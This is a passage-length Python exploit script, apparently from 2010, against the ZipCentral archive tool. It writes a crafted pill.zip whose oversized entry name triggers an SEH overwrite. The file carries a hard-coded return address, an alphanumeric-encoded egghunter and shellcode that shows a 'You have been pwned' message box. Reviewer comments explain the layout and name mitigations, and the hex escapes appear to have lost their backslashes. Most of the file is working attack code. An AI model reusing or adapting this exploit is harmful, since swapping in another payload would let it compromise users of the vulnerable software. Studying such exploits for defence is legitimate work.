# Title : ZipCentral (.zip) SEH Exploit
# Published : 2010-04-04
# Author : TecR0c
#!/usr/bin/python
#
# Title: ZipCentral (.zip) SEH exploit
# Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Download: http://downloads.pcworld.com/pub/new/utilities/compression/zcsetup.exe
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Unfortunately, no one can be told what the Matrix is. You have to see it for yourself!
# To be able to make sure your hex values get mangled correctly i have created my own
# Mangled Chart: http://tecninja.net/blog/?p=35
# Description of exploit: http://tecninja.net/blog/?p=73
# You can notice i have used this technique for my PPR and JMPs
# Console banner with author/team credits, printed when the script runs.
# These strings are not referenced again in the visible script.
# The paren-less `print "..."` form is Python 2 statement syntax.
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] pill (.zip) SEH exploit - by TecR0c"
# ZIP container records that are written around the oversized entry name
# (`buff`) when the archive is emitted at the end of the script.
# NOTE(review): the values read as hex escapes whose backslashes appear to have
# been dropped when this page was rendered (e.g. "x50x4B" for bytes 50 4B); the
# notes below interpret each xNN token as the single byte it stands for.
#
# Local file header: starts with 50 4B 03 04, the ZIP local-file-header
# signature. The pair e4 0f is 0x0FE4 = 4068 (little-endian), which equals the
# final length of `buff` (padded to 4064, plus ".txt") -- presumably the
# filename-length field; confirm against the ZIP specification.
# Detection note: an entry declaring a name of several thousand bytes is far
# longer than any ordinary file name and is a practical signal for archive
# scanners and gateways.
ldf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00")
# Central directory file header: starts with 50 4B 01 02 and carries the same
# e4 0f (4068) length value as the local header.
cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
# End-of-central-directory record: starts with 50 4B 05 06.
# 12 10 00 00 = 0x1012 = 4114 and 02 10 00 00 = 0x1002 = 4098, i.e. 46 + 4068
# and 30 + 4068 for the header lengths shown above -- presumably the central
# directory size and its offset; TODO confirm against the ZIP specification.
eofcdf_header = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
"x12x10x00x00"
"x02x10x00x00"
"x00x00")
# Leading, human-readable part of the archive entry name.
# The buffer-assembly code further down pads this value with 0x20 to 50 bytes,
# which matches the author's limit noted here.
#Limit of 50 bytes for the filename
# Alternative name left commented out by the author (labelled PASSWORDS):
#PASSWORDS
#filename = ("x50x41x53"
#"x53x57xeax52x44x53")
# Active choice: the bytes 52 65 61 64 4d 65 are the ASCII text "ReadMe".
#ReadMe
filename = (
"x52x65x61x64x4dx65")
# Three hard-coded payload components that the assembly code below places
# inside the entry name. `egghunter` and `msg` consist only of printable
# alphanumeric characters -- presumably machine code passed through an
# alphanumeric encoder; not decoded or verified in this review.
#
# `egghunter`: the name suggests a small stub that searches memory for the
# tagged `msg` payload; the tag itself is written by the assembly code.
# ESI - Im going to enjoy watching you die Mr Anderson
egghunter = ("VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIBFmQzjk"
"OdOw2sb3ZUR68JmVNulUUQJSDJOx867Dpdp64nkKJNOpuKZNOT5JGYokWA")
# `getpc`: a 12-byte sequence that, per the author's comment below, aligns ESI
# before the encoded stub runs.
# align ESI for msg - To deny our own impulses is to deny the very thing that makes us human
getpc = ("x89x05x5ex41x98x99x41x8ax94x98x98x98")
# `msg`: per the author's inline note, a proof-of-concept payload that shows a
# message box (title "Corelan", text "You have been pwned").
# EDI is chosen thanks to the egghunter - Never send a human to do a machines job
msg = ( # TITLE=Corelan TEXT="You have been pwned"
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkOkJy4"
"4a4yd4qXRlr2Zp1HIpdNk2Q00lK2VVllKpvglnkg6THNksNUpLKVVWHPOfxRU"
"l3ryUQKakOXa50nkPlvDtdLKW5wLlKPTTEPxWqKZLK0J6xnk1JwPVahkM35g1"
"YlK7DLKVaXn6Q9o6QkpKLnLMTIP0tTJKq8O4Ms1iWm9hqyo9okOWKQlwTWXae"
"knnk0ZUtGqzK1vNk6l0KLKPZuLs1jKLK4Dnkc1m8NiQTwT7lu1O3oBTHGYn4O"
"y8eLIKrqxnnPNVnZL3bkXmLKOkOKOK9pETDOKqnKhM2qcmW5Lddcbm8NkKOIo"
"KOoyqU4H3XRLrLGPkOu8tsvR6NQte8QeQc0esBoxQLetwzOyKVF6Yo65vdmY9"
"RrpmklhoRPMmlowglut2rM8CnKOKO9oQxRLparNqH1xrcPobR2EEaKkmXQLTd"
"UWMY9saxBNsUu4shu8RNq0RPqgRHq0QrBE3UU80h3QPvQu58QIBOd5upvQO9m"
"XpLutvsK9YqfQN22r63SaaBio8PVQyPpP9oPUS8vjA")
# Assemble the oversized archive entry name. The layout below follows from the
# len(buff) arithmetic, assuming each xNN token stands for one byte:
#   0..49       visible name padded with 0x20 (spaces)
#   50..57      the 4-byte tag 57 30 30 54 (ASCII "W00T"), written twice
#   58..652     `msg`, then 0x41 filler up to offset 653
#   653..660    two hard-coded 4-byte values -- presumably the overwritten SEH
#               record (per the title); the second looks like an address tied
#               to the author's test platform (XP SP3 per the header) -- TODO
#               confirm
#   661..       10 bytes of 0x41, `getpc`, `egghunter`, then 0x42 filler
#   4064..4067  the ".txt" extension
# The total of 4068 bytes matches the e4 0f length value in the ZIP headers.
# Defensive note: the durable fix is for the archive parser to bounds-check the
# entry name length before copying it; SafeSEH/SEHOP and DEP are the platform
# mitigations aimed at this class of overwrite.
buff = filename
buff += "x20" * (50-len(buff))
buff += "x57x30x30x54" # If you close your eyes, it almost feels like you're eating runny eggs
buff += "x57x30x30x54" # The trace was completed
buff += msg # Don't hate me Trinity... I'm just the messenger
buff += "x41" * (653-len(buff))
buff += "x89x06x42x42"
buff += "x56x29xa5x72" # Welcome to the desert of the real
buff += "x41" * 10
buff += getpc
buff += egghunter # The digital pimp hard at work
buff += "x42" * (4064-len(buff))
buff += ".txt"
# Emit the crafted archive as pill.zip in the current working directory
# (mode 'w' truncates any existing file of that name). Record order: local
# header + entry name, central directory header + entry name, then the
# end-of-central-directory record.
with open('pill.zip','w') as mefile:
    archive_bytes = ldf_header + buff + cdf_header + buff + eofcdf_header
    mefile.write(archive_bytes)